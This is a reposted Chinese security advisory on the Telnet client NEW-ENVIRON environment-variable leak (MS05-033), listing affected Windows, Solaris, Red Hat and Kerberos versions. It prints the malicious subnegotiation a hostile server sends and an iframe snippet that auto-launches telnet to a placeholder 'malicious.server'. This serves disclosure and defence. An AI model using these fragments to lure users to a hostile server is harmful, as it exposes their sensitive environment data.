 |
多家厂商Telnet客户端环境变量信息泄露漏洞(MS05-033) |
|
|
| 多家厂商Telnet客户端环境变量信息泄露漏洞(MS05-033) |
|
| 作者:佚名 文章来源:不详 点击数: 更新时间:2007-1-25 9:18:17 |
|
发布日期:2005-06-15
更新日期:2005-06-15
受影响系统:
Microsoft Windows XP SP2
Microsoft Windows XP SP1
Microsoft Windows Services for UNIX 3.5
Microsoft Windows Services for UNIX 3.0
Microsoft Windows Services for UNIX 2.2
RedHat Linux Advanced Workstation 2.1
Sun Solaris 9.0_x86 Update 2
Sun Solaris 9.0_x86
Sun Solaris 9.0
Sun Solaris 8.0_x86
Sun Solaris 8.0
Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun Solaris 2.8
Sun Solaris 2.7 sparc
Sun Solaris 2.7
Sun Solaris 10.0
Sun SunOS 5.9_x86
Sun SunOS 5.9
Sun SunOS 5.8_x86
Sun SunOS 5.8
Sun SunOS 5.7_x86
Sun SunOS 5.7
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 4
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux ES 2.1
RedHat Enterprise Linux Desktop 4
RedHat Enterprise Linux AS 4
RedHat Enterprise Linux AS 3
RedHat Enterprise Linux AS 2.1
RedHat Desktop 3.0
Sun SEAM 1.0.2
Sun SEAM 1.0.1
Sun SEAM 1.0
MIT Kerberos 5 1.3.6
不受影响系统:
Microsoft Windows ME
Microsoft Windows 98se
Microsoft Windows 98
Microsoft Windows 2000SP4
Microsoft Windows 2000SP3
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 13940
CVE(CAN) ID: CAN-2005-1205,CAN-2005-0488
TELNET协议允许虚拟网络终端通过Internet进行连接。
多家厂商的Telnet客户端存在设计错误,可能允许远程攻击者获得受攻击系统的敏感信息。
具体的说,Telnet客户端在处理NEW-ENVIRON子协商选项时会触发这个漏洞,恶意的服务器可以向已连接的客户端发送以下Telnet子协商选项:
SB NEW-ENVIRON SEND ENV_USERVAR <name of environment variable> SE
然后有漏洞的客户端就会发回环境变量的内容,这其中可能包含有敏感信息。
如果要利用这个漏洞,攻击者必须诱骗用户连接到恶意的服务器。可能通过网页自动启动telnet命令,如:
<html><body>
<iframe src=’telnet://malicious.server/’>
</body>
一旦打开了这个网页,就会自动启动telnet客户端并试图连接到主机“malicious.server”。
<*来源:Gaël Delalleau (gael.delalleau+moz@m4x.org)
iDEFENSE
链接:http://www.idefense.com/application/poi/display?id=260&type=vulnerabilities
http://www.microsoft.com/technet/security/Bulletin/MS05-033.mspx
http://www.us-cert.gov/cas/techalerts/TA05-165A.html
http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-101671-1
http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-101665-1
http://lwn.net/Alerts/139795/?format=printable
*> 【转自世纪安全网 http://www.21safe.com】
|
|
| 新闻录入:admin 责任编辑:admin |
|
|
上一篇新闻: 微软发布2005年6月份安全公告[详细分析]
下一篇新闻: 关于18号打9个补丁后不能显示验证码的问题 |
|
|
| 【字体:小 大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |
|
|
 网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!) |
|
|
|
|
|
